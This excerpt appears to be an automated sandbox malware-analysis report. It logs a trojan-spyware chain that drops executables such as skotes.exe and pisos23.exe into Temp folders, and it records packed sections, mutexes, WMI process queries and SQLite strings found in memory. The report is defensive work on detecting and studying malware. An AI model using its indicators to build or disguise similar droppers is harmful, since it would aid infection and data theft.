Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AF0390	7_2_00AF0390
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A81BE0	7_2_00A81BE0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A97BE0	7_2_00A97BE0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B023E0	7_2_00B023E0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A833F0	7_2_00A833F0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ACE3F0	7_2_00ACE3F0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A703C0	7_2_00A703C0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ABA3C0	7_2_00ABA3C0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ADFBC0	7_2_00ADFBC0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A733D0	7_2_00A733D0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AABBD0	7_2_00AABBD0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ACB3D0	7_2_00ACB3D0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AE63D0	7_2_00AE63D0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B0F330	7_2_00B0F330
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B01B30	7_2_00B01B30
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A89320	7_2_00A89320
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA6330	7_2_00AA6330
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB6330	7_2_00AB6330
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B0A310	7_2_00B0A310
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A6FB10	7_2_00A6FB10
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A99B10	7_2_00A99B10
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ACAB10	7_2_00ACAB10
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B20B72	7_2_00B20B72
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A81360	7_2_00A81360
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB1360	7_2_00AB1360
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AC0B60	7_2_00AC0B60
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AEDB60	7_2_00AEDB60
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AE9B60	7_2_00AE9B60
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AF0B60	7_2_00AF0B60
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A92370	7_2_00A92370
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A8CB40	7_2_00A8CB40
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA8B40	7_2_00AA8B40
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA5B50	7_2_00AA5B50
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA7350	7_2_00AA7350
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AE7B50	7_2_00AE7B50
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A9DCA0	7_2_00A9DCA0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA7CA0	7_2_00AA7CA0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A66CB0	7_2_00A66CB0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A79CB0	7_2_00A79CB0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A78CB0	7_2_00A78CB0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A84CB0	7_2_00A84CB0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B0C490	7_2_00B0C490
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A74480	7_2_00A74480
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A8DC80	7_2_00A8DC80
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A9C4E0	7_2_00A9C4E0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A9BCE0	7_2_00A9BCE0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB44F0	7_2_00AB44F0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD6CF0	7_2_00AD6CF0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AF4CC0	7_2_00AF4CC0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B084C0	7_2_00B084C0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B064C0	7_2_00B064C0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B05CC0	7_2_00B05CC0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A7B4D0	7_2_00A7B4D0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AE4CD0	7_2_00AE4CD0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B0EC30	7_2_00B0EC30
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A99420	7_2_00A99420
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A95C30	7_2_00A95C30
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ACF430	7_2_00ACF430
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A8A400	7_2_00A8A400
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA8400	7_2_00AA8400
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ABDC00	7_2_00ABDC00
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A9FC10	7_2_00A9FC10
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ABFC10	7_2_00ABFC10
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ADA410	7_2_00ADA410
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD0C10	7_2_00AD0C10
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A79460	7_2_00A79460
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A94C60	7_2_00A94C60
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ABEC60	7_2_00ABEC60
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AC7460	7_2_00AC7460
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AE3460	7_2_00AE3460
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AAA470	7_2_00AAA470
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ABF470	7_2_00ABF470
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB3C70	7_2_00AB3C70
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AC3C70	7_2_00AC3C70
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B26452	7_2_00B26452
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A9EC40	7_2_00A9EC40
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AF7C50	7_2_00AF7C50
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA15A0	7_2_00AA15A0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA45A0	7_2_00AA45A0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA75A0	7_2_00AA75A0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B015A0	7_2_00B015A0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A845B0	7_2_00A845B0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB25B0	7_2_00AB25B0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD9DB0	7_2_00AD9DB0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B07D90	7_2_00B07D90
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD7D80	7_2_00AD7D80
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B00580	7_2_00B00580
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA5D90	7_2_00AA5D90
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA55E0	7_2_00AA55E0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD05E0	7_2_00AD05E0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD95F0	7_2_00AD95F0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B0DD30	7_2_00B0DD30
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A7ED20	7_2_00A7ED20
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A7BD20	7_2_00A7BD20
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A92D20	7_2_00A92D20
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD1D20	7_2_00AD1D20
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B0D520	7_2_00B0D520
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AC4530	7_2_00AC4530
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD4D30	7_2_00AD4D30
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AE1D30	7_2_00AE1D30
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A75D00	7_2_00A75D00
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B03500	7_2_00B03500
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A7CD10	7_2_00A7CD10
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AAD560	7_2_00AAD560
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AF9560	7_2_00AF9560
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A67540	7_2_00A67540
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA9540	7_2_00AA9540
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AEF540	7_2_00AEF540
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AE7540	7_2_00AE7540
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AFDD40	7_2_00AFDD40
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD5D50	7_2_00AD5D50
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A686B0	7_2_00A686B0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B09690	7_2_00B09690
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B08EF0	7_2_00B08EF0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A99EC0	7_2_00A99EC0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AEC6C0	7_2_00AEC6C0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B046C0	7_2_00B046C0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A67ED0	7_2_00A67ED0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A74ED0	7_2_00A74ED0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ADB6D0	7_2_00ADB6D0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B0AE30	7_2_00B0AE30
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A64E20	7_2_00A64E20
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A6F620	7_2_00A6F620
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A71620	7_2_00A71620
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A9F620	7_2_00A9F620
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A6CE30	7_2_00A6CE30
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A72630	7_2_00A72630
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB3600	7_2_00AB3600
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A72E10	7_2_00A72E10
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD8E10	7_2_00AD8E10
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AE1610	7_2_00AE1610
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B0E675	7_2_00B0E675
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A93E60	7_2_00A93E60
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AAEE60	7_2_00AAEE60
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A73670	7_2_00A73670
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A8CE70	7_2_00A8CE70
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AAAE70	7_2_00AAAE70
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD0E70	7_2_00AD0E70
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AFFE50	7_2_00AFFE50
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A8DFA0	7_2_00A8DFA0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A917A0	7_2_00A917A0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B0E790	7_2_00B0E790
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A99780	7_2_00A99780
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A95780	7_2_00A95780
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB3F80	7_2_00AB3F80
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B0DF80	7_2_00B0DF80
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A9D790	7_2_00A9D790
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A78FE0	7_2_00A78FE0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD2FE0	7_2_00AD2FE0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AF77E0	7_2_00AF77E0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B027E0	7_2_00B027E0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A65FF0	7_2_00A65FF0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A8EFF0	7_2_00A8EFF0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AF87F0	7_2_00AF87F0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A6A7C0	7_2_00A6A7C0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AF4FC0	7_2_00AF4FC0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A877D0	7_2_00A877D0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A9E7D0	7_2_00A9E7D0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA4FD0	7_2_00AA4FD0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A90F20	7_2_00A90F20
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA3F20	7_2_00AA3F20
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B01F20	7_2_00B01F20
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A7A730	7_2_00A7A730
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A75730	7_2_00A75730
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A93730	7_2_00A93730
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ABCF30	7_2_00ABCF30
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A91F00	7_2_00A91F00
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AE6F00	7_2_00AE6F00
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A66710	7_2_00A66710
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A8E710	7_2_00A8E710
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AF7F10	7_2_00AF7F10
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AACF60	7_2_00AACF60
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB2F60	7_2_00AB2F60
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B0EF60	7_2_00B0EF60
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B04F60	7_2_00B04F60
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A88F70	7_2_00A88F70
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA7770	7_2_00AA7770
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B00F50	7_2_00B00F50
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A94F50	7_2_00A94F50
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB7750	7_2_00AB7750
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AFEF50	7_2_00AFEF50

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 008D80C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00B380C0 appears 260 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00B3DF80 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: String function: 00B11870 appears 37 times

Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7796 -s 264

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: pisos23.exe.6.dr	Static PE information: Section: .pdata ZLIB complexity 1.0003399527914614
Source: random[1].exe.6.dr	Static PE information: Section: ZLIB complexity 0.9981325920846394
Source: 3e169c0a7e.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9981325920846394
Source: pisos23[1].exe.6.dr	Static PE information: Section: .pdata ZLIB complexity 1.0003399527914614
Source: random[1].exe0.6.dr	Static PE information: Section: fawplrfx ZLIB complexity 0.9949967487469623
Source: 7fb3e2a1d2.exe.6.dr	Static PE information: Section: fawplrfx ZLIB complexity 0.9949967487469623

Source: file.exe	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.0.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@111/115@196/33

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pisos23[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2780:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:64:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8308:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:64:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1120:64:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7796
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 7fb3e2a1d2.exe, 0000000E.00000002.3586807815.000000001D8E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3586807815.000000001D8E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3586807815.000000001D8E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3586807815.000000001D8E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3586807815.000000001D8E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3586807815.000000001D8E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3586807815.000000001D8E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
